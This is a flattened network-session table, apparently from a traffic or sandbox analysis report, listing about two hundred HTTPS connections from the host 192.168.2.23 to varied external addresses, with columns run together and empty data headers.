                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10601192.168.2.2337836128.25.207.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10602192.168.2.235043042.107.24.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10603192.168.2.234058243.17.4.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10604192.168.2.2337042119.48.138.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10605192.168.2.2352660117.192.91.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10606192.168.2.234431650.165.203.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10607192.168.2.2337934113.9.20.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10608192.168.2.235341268.29.183.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10609192.168.2.233449035.65.34.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10610192.168.2.2333008180.2.136.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10611192.168.2.2348286175.31.67.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10612192.168.2.2357314186.105.55.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10613192.168.2.235240018.243.50.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10614192.168.2.234969251.47.14.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10615192.168.2.2347838167.29.25.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10616192.168.2.235352020.242.121.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10617192.168.2.235788647.12.235.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10618192.168.2.2346988220.234.45.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10619192.168.2.233768418.136.34.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10620192.168.2.2355622134.181.42.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10621192.168.2.235914647.168.128.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10622192.168.2.233575482.101.43.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10623192.168.2.2345504210.255.187.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10624192.168.2.2356250180.128.229.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10625192.168.2.2358872198.248.78.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10626192.168.2.235889651.43.18.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10627192.168.2.2358642161.20.13.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10628192.168.2.233435259.122.87.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10629192.168.2.2343914117.75.81.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10630192.168.2.2334020126.160.233.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10631192.168.2.234165685.139.2.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10632192.168.2.233960031.114.113.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10633192.168.2.2341052123.7.170.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10634192.168.2.234458614.13.78.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10635192.168.2.2342368145.93.44.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10636192.168.2.234340413.162.151.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10637192.168.2.234652670.218.148.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10638192.168.2.235195696.169.45.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10639192.168.2.2360600177.87.3.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10640192.168.2.234613423.131.191.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10641192.168.2.2360882163.23.119.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10642192.168.2.235223247.226.54.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10643192.168.2.235141867.99.23.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10644192.168.2.2335436120.204.222.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10645192.168.2.234118653.88.99.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10646192.168.2.2354210193.196.157.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10647192.168.2.23438325.51.159.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10648192.168.2.2343120190.83.19.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10649192.168.2.233880254.145.172.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10650192.168.2.2338060137.238.71.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10651192.168.2.234925098.223.161.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10652192.168.2.233609662.233.116.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10653192.168.2.234977053.87.204.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10654192.168.2.2346058209.123.120.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10655192.168.2.2348198207.45.0.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10656192.168.2.2351816216.79.103.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10657192.168.2.2353222206.119.223.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10658192.168.2.2335296178.249.13.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10659192.168.2.2356570104.197.40.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10660192.168.2.2333470195.68.213.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10661192.168.2.2349804132.67.77.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10662192.168.2.236092039.108.67.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10663192.168.2.23367564.217.10.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10664192.168.2.2343094169.40.65.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10665192.168.2.2347742204.40.40.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10666192.168.2.2346840162.226.152.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10667192.168.2.2345728207.55.232.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10668192.168.2.2335882219.136.254.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10669192.168.2.2343010108.135.25.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10670192.168.2.2360300152.46.231.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10671192.168.2.2348338158.166.23.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10672192.168.2.234294448.135.54.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10673192.168.2.233444498.37.188.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10674192.168.2.2335140108.236.147.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10675192.168.2.2360172201.97.235.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10676192.168.2.2359906193.152.200.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10677192.168.2.2353044170.78.21.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10678192.168.2.235252868.144.228.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10679192.168.2.2358964176.218.12.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10680192.168.2.236083053.231.240.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10681192.168.2.2355594208.101.30.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10682192.168.2.235182264.36.177.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10683192.168.2.234557086.148.106.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10684192.168.2.233814694.218.34.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10685192.168.2.2341430180.152.159.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10686192.168.2.2339376187.71.77.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10687192.168.2.2335866169.32.43.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10688192.168.2.235210293.249.73.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10689192.168.2.233479695.30.73.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10690192.168.2.2350574200.236.242.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10691192.168.2.2338488104.37.33.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10692192.168.2.234513888.86.36.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10693192.168.2.23576481.214.194.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10694192.168.2.2341044219.221.27.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10695192.168.2.233303225.125.220.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10696192.168.2.235871295.33.61.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10697192.168.2.2353398204.139.14.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10698192.168.2.233942439.193.144.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10699192.168.2.233959289.130.187.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10700192.168.2.2351668105.239.218.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10701192.168.2.2354224169.131.246.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10702192.168.2.2360710154.250.194.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10703192.168.2.2337144138.215.108.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10704192.168.2.2334422204.151.144.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10705192.168.2.233537699.59.19.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10706192.168.2.2357796104.4.199.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10707192.168.2.2352616166.151.126.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10708192.168.2.233297282.103.67.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10709192.168.2.234854257.147.114.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10710192.168.2.234049471.211.245.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10711192.168.2.234284082.249.72.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10712192.168.2.233593664.187.201.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10713192.168.2.2333848133.198.13.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10714192.168.2.234924466.167.119.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10715192.168.2.235241446.176.123.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10716192.168.2.2342682207.207.175.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10717192.168.2.2359166218.117.118.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10718192.168.2.234068836.98.161.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10719192.168.2.233502695.202.91.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10720192.168.2.235554259.45.121.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10721192.168.2.2350544116.87.255.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10722192.168.2.2338972137.232.90.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10723192.168.2.2359660206.147.240.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10724192.168.2.2360208110.45.91.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10725192.168.2.2357078125.76.81.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10726192.168.2.2356854111.70.146.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10727192.168.2.234853084.128.149.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10728192.168.2.2347716155.76.87.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10729192.168.2.235861461.52.179.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10730192.168.2.2346548140.156.165.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10731192.168.2.234197024.220.27.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10732192.168.2.234757231.97.33.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10733192.168.2.2349852209.132.209.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10734192.168.2.2353388170.143.193.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10735192.168.2.2355426160.96.141.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10736192.168.2.2346882187.104.12.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10737192.168.2.2338186207.221.87.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10738192.168.2.2347676190.152.98.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10739192.168.2.235565679.138.41.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10740192.168.2.2352210205.77.140.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10741192.168.2.2355030177.47.198.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10742192.168.2.2353518186.111.240.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10743192.168.2.2342686208.38.46.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10744192.168.2.234150060.90.6.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10745192.168.2.2351636164.190.52.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10746192.168.2.2342842159.225.36.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10747192.168.2.2344626161.24.90.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10748192.168.2.2349320200.143.98.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10749192.168.2.2351918162.222.71.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10750192.168.2.2339686184.153.0.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10751192.168.2.2341564149.126.67.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10752192.168.2.235634248.155.72.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10753192.168.2.233551496.245.69.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10754192.168.2.23334521.8.6.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10755192.168.2.2353262187.34.142.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10756192.168.2.2350192168.126.1.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10757192.168.2.2343148186.15.103.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10758192.168.2.2339402118.150.49.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10759192.168.2.2344484178.67.67.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10760192.168.2.2334884141.48.74.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10761192.168.2.2333056216.213.255.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10762192.168.2.2349808131.15.203.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10763192.168.2.233515476.119.126.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10764192.168.2.234344840.19.26.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10765192.168.2.235136681.3.152.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10766192.168.2.235727076.43.107.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10767192.168.2.235259494.226.145.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10768192.168.2.235851465.223.210.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10769192.168.2.233818442.11.129.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10770192.168.2.236083492.14.224.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10771192.168.2.2343328105.125.64.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10772192.168.2.2355318120.184.128.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10773192.168.2.2348118161.154.129.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10774192.168.2.2334414100.208.237.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10775192.168.2.23353489.3.57.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10776192.168.2.2334526150.68.228.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10777192.168.2.2352784112.25.7.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10778192.168.2.234682882.67.228.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10779192.168.2.2341362203.21.127.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10780192.168.2.234578667.172.208.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10781192.168.2.2336890203.72.109.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10782192.168.2.2345966129.26.84.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10783192.168.2.234714439.19.18.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10784192.168.2.2334160155.133.129.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10785192.168.2.234328651.7.79.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10786192.168.2.235027024.16.63.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10787192.168.2.2334184101.179.243.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10788192.168.2.234407819.109.64.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10789192.168.2.2348198112.178.4.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10790192.168.2.2342682158.138.105.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10791192.168.2.235506270.253.10.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10792192.168.2.235454032.130.85.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10793192.168.2.2341342134.255.154.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10794192.168.2.2345756115.78.201.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10795192.168.2.2338998150.36.190.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10796192.168.2.234840840.165.150.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10797192.168.2.2341384182.88.196.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10798192.168.2.2353348123.115.60.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10799192.168.2.2355652167.145.235.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10800192.168.2.233753845.205.7.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10801192.168.2.233797617.228.85.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10802192.168.2.2334678188.111.145.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10803192.168.2.2360054184.15.161.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10804192.168.2.2351776189.237.106.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10805192.168.2.234083879.245.67.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10806192.168.2.2342342175.208.90.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10807192.168.2.2340204216.50.219.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10808192.168.2.235933045.168.252.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10809192.168.2.2335142172.199.115.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10810192.168.2.2357406168.82.192.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10811192.168.2.234149677.245.203.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10812192.168.2.2337192178.115.148.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10813192.168.2.235619265.253.182.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10814192.168.2.2357828192.231.3.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10815192.168.2.2341978220.248.227.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10816192.168.2.2342820118.237.66.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10817192.168.2.2360498182.244.104.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10818192.168.2.234695699.152.199.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10819192.168.2.234396242.27.43.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10820192.168.2.2351826221.159.171.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10821192.168.2.2360694148.137.4.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
